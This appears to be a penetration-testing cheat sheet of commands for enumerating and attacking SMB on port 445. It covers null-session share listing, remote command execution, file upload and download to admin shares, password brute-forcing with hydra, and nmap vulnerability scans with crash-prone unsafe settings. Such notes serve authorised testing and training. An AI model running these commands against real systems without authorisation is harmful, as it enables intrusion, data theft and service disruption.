SMB (tcp-445)
Post

SMB (tcp-445)

SMBMAP

Null Session

Guest can be exchanged with “”

1
smbmap -u guest -p "" -H <IP> -L

Authenticathed

1
smbmap -H <IP> -u 'user' -p 'pass' -d .

Command Execution

1
smbmap -H <IP> -u 'user' -p 'pass' -x 'ipconfig'

Connect to a share

1
smbmap -u guest -p "" -H <IP> -r "C$"

Upload a file

1
smbmap -u administrator -p 'smbserver_771' -H <IP> --upload "/path/to/local/file" "C$\path\to\remote\file"

Download a file

1
smbmap -u administrator -p 'smbserver_771' -H <IP> --download "C$\path\to\remote\file"

CRACKMAPEXEC

Retrieve Domain Info

1
crackmapexec smb <IP>

Null Session

A dummy user is needed if the machine is part of a Domain.

1
crackmapexec smb 10.10.11.175 -u 'abc' -p ''

Also it is possible to execute crackmapexec with a file with hashes:

1
crackmapexec ldap 10.10.10.248 -u 'svc_int' -H hashes --continue-on-success

ENUM4LINUX

General info

Do all simple enumeration (-a) with user (-u) admin and password (-p):

1
enum4linux -a -u "admin" -p "password1" <IP>

NMAP

SMB Multiple Vulns

Please Note: If we set the script parameter unsafe=1, the scripts that will run are almost (or totally) guaranteed to crash a vulnerable system. Needless to say, exercise extreme caution when enabling this argument, especially when scanning production systems.

1
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe=1 10.11.1.5

Version of SMB

1
nmap -p445 --script smb-protocols 10.4.31.9

OS Discovery

1
nmap -p139,445 --script smb-os-discovery 10.4.31.9 

Authentication verification

1
nmap -p445 --script smb-security-mode 10.4.31.9

Sessions

Args optional if credentials exists

1
nmap -p445 --script smb-enum-sessions <--script-args smbusername=administrator,smbpassword=smbserver_771> 10.4.31.9

Shares

Args optional if credentials exists

1
nmap -p445 --script smb-enum-shares,smb-ls <--script-args smbusername=administrator,smbpassword=smbserver_771> 10.4.31.9

Users

Args optional

1
nmap -p445 --script smb-enum-users <--script-args smbusername=administrator,smbpassword=smbserver_771> 10.4.31.9

Statistics

1
nmap -p445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.31.9

Domains

1
nmap -p445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 10.4.31.9

Get more info about scripts:

1
ls -l /usr/share/nmap/scripts/smb*

Mounting

Linux:

1
2
mount -t cifs "//10.10.10.103/Department Shares" /mnt/tempMount
umount /mnt/tempMount # To dismount the share

Examples: Sizzle

Windows:

1
net use Z: \\10.0.22.92\C$ smbserver_771 /user:administrator

NMBLOOKUP

Lookup by IP

Shows different permissions of shares

1
nmblookup -A 10.0.0.1

SMBCLIENT

Null session

Shares:

1
smbclient -L 10.0.1.1 -N

Examples: Outdated Connect to a Share:

1
smbclient //10.10.11.175//Share -N

Examples: Outdated

Authenticated

1
smbclient //10.10.11.102 -U 'localadmin%Secret123'

Examples: [[Anubis]]

Download a Share

1
2
3
4
# First connect to it and then run this commands:
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Enumerate permissions on shares:

Smbcacls:

1
smbcacls "//10.10.10.103/Department Shares" Users/amanda -N

Script to enumerate permissions recursively on every folder

1
for dir in $(cat users); do echo -e "\n[+] Trying directory $dir:\n"; echo -e "\t[-] $(smbcacls "//10.10.10.103/Department Shares" Users/$dir -N)" | grep "Everyone" ; done

Examples: Sizzle

HYDRA

Get the correct password by bruteforcing:

1
hydra -l user -P /path/to/wordlist <IP> smb

Exploitation MS17-010 on Windows XP

Manual exploitation can be found at MS17-010

Reference:

setup manual MS17-010 for Windows XP